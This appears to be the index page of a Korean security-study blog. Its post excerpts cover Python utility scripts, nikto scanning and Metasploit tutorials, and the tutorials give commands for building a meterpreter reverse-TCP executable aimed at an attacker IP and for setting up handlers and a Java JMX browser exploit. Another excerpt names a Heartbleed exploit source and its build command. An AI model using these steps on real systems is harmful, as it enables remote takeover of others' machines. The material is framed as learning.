전체 글289

• 

  how to change hostname (hostname 바꾸기 ) hostname이란? 연결된 장치의 이름을 말한다. 여기서 보면 parrotsec이란 것이 hostname 이다. hostname이란 명령어를 이용하여 일시적으로 변경이 가능하지만 /etc/hostname에서 변경을 하여 바꿀 수 있다. 두둥 :) Security Study/Server(Linux) 2016. 12. 23.

• 

  Kali Linux by pass - Hack Windows metasploit tutorial 모든 책임은 사용자 본인에게 있습니다. 먼저 service apache2 startservice postgresql startservice metasploit startmsfvenom -p windows/meterpreter/reverse_tcp LHOST=[attacker ip] LPORT=[원하는 포트] -f exe > filename.exe 그럼 /root 폴더에 exe파일이 생긴것을 확인할수 있다.그럼 다음으로는 컨트롤할 핸들러를 만들어보자. 먼저 msfconsole을 입력한다. use exploit/multi/handlerset payload windows/meterpreter/reverse_tcp [우리가 파일을 만들때 사용한 payload]set LHOST [attacker ip]set LP.. Metasploit 2016. 12. 22.

• base 64 원하는 횟수만큼 decoding 하기 python (파일 넣어서) # -*- coding:utf-8 -*- import base64 f = open("")#파일 명 (경로) Buff = f.readlines() Buff = str(Buff) for x in range(0, 50): #50자리에 반복하고 싶은 횟수 Buff = base64.decodestring(Buff) print Buff Language 2016. 12. 22.

• 

  Hack windows with metasploit Java Applet JMX Remote Code Execution 모든 책임은 사용자에게 있습니다. 연구 목적으로만 사용하시기 바랍니다. 먼저 하기전에 리눅스에서 service apache2 startservice postgresql startservice metastploit start 명령어들을 실행 시켜준다. 그 후 msfconsole을 해준다. 그럼 위와같은 창이 뜰것이다. (그림은 다를 수 있다.) 그 후 우리가 해야할 일은 핸들러를 만드는 일이다.use exploit/multi/browser/java_jre17_jmxbean_2 명령어를 이용하여 핸들러를 만든다. 우리가 다음 해야 할 행동으로 show options 을 이용하여 우리가 정해줘야하는 것을 본다. 먼저 URIPATH 명령어를 이용하여 경로를 지정해준다. / 해도되고 test를 해도된다. 지정하지.. Metasploit 2016. 12. 22.

• 

  web server 취약점 스캐너 nikto :) 웹 서버 취약점 점검 툴인 nikto에 대해 알아보자 :) 공식 홈페이지는 https://cirt.net/Nikto2 이다 . 여기서 다운을 받을 수있고 설치를 할수 있다. 리눅스 같은경우 apt-get install nikto 와 yum install nikto 로 쉽게 받을 수있다. Mac OS같은 경우에는 brew install nikto 를 하면 쉽게 받을수있다 . 먼저 명령어를 보자 간단하게 터미널에서 nikto 만 치게 되면 도움말들이 나타나는 것을 알 수있다. 조금 더 자세히 알고 싶다면 nikto -Help 를 입력한다면 이렇게 많은 도움말을 볼수가 있다. nikto 의 사용법을 알아보면 nikto -h [HOST IP] 이렇게만 해도된다. 왜냐 기본적으로 포트는 80번이 디폴트 값을 지니.. Security Study/Web 2016. 12. 21.

• individual bands of image.py from PIL import Imageimport numpy as np im = Image.open('heartbleed.png') # In this case, it's a 3-band (red, green, blue) image# so we'll unpack the bands into 3 separate 2D arrays.r, g, b = np.array(im).T # Let's make an alpha (transparency) band based on where blue is < 100a = np.zeros_like(b)a[b Language 2016. 12. 21.

• RGB image analysis.py import numpy as npimport mpl_toolkits.mplot3d.axes3d as p3import matplotlib.pyplot as pltimport colorsysfrom PIL import Image # (1) Import the file to be analyzed!img_file = Image.open("sunset.jpg")img = img_file.load() # (2) Get image width & height in pixels[xs, ys] = img_file.sizemax_intensity = 100hues = {} # (3) Examine each pixel in the image filefor x in xrange(0, xs): for y in xrange(0, .. Language 2016. 12. 21.

• 

  image GPS.py from PIL import Imagefrom PIL.ExifTags import TAGS filename = "sunset.jpg"extension = filename.split('.')[-1]if (extension == 'jpg') | (extension == 'JPG') | (extension == 'jpeg') | (extension == 'JPEG') | (extension == 'PNG') |(extension == 'png'): try: img = Image.open(filename) info = img._getexif() exif = {} for tag, value in info.items(): decoded = TAGS.get(tag, tag) exif[decoded] = value #.. Language 2016. 12. 21.

• 

  base image.py from PIL import Image img = Image.open("filename.jpg")print(img.size)print(img.format) img.show() Language 2016. 12. 21.

• 

  Heartbleed :) 하트블리드 heartbleed 는 2015년 보안 취약점 중 대표적인 취약점이라 할수 있다. heartbleed 취약점은 공격자가 서버의 메모리의 일부분을 읽어 올 수 있는 openSSL의 취약점으로 요청할때 요청할 단어가 만약 aaa이면 3바이트를 요청하면 되는데 이 보다 더 큰 바이트인 500을 하게 된다면 aaa를 반환하고 남은 메모리를 다른 값으로 뱉어 주는 취약점을 말한다. 취약점을 실습해볼 때에는 1. https://raw.githubusercontent.com/HackerFantastic/Public/master/exploits/heartbleed.c여기서 다운을 받은 후 2. gcc heartbleed.c -o heartbleed -Wl,-Bstatic -ssl -Wl,-Bdynamic -lssl3 .. Metasploit 2016. 12. 21.

• python 같은 파일 뽑아내기 :) 사전파일에 파일이름과 폴더를 지정해주면 중복파일을 뽑아줍니다 :) # -*- coding: utf-8 -*- import os f = open('/Users/z3alous/Desktop/flag1.txt', 'w') Language 2016. 12. 18.

• md5 한번에 인코딩하기 :) ex)폴더지정 # -*- coding: utf-8 -*-import hashlibimport os f = open('/Users/z3alous/Desktop/flag.txt', 'w') def md5(fname): hash_md5 = hashlib.md5() with open(fname, "rb") as f: for chunk in iter(lambda: f.read(4096), b""): hash_md5.update(chunk) return hash_md5.hexdigest() for root, dirs, files in os.walk('폴더 경로'): for fname in files: full_fname = os.path.join(root, fname) f.write(md5(full_fname) + '\n') f.. Language 2016. 12. 18.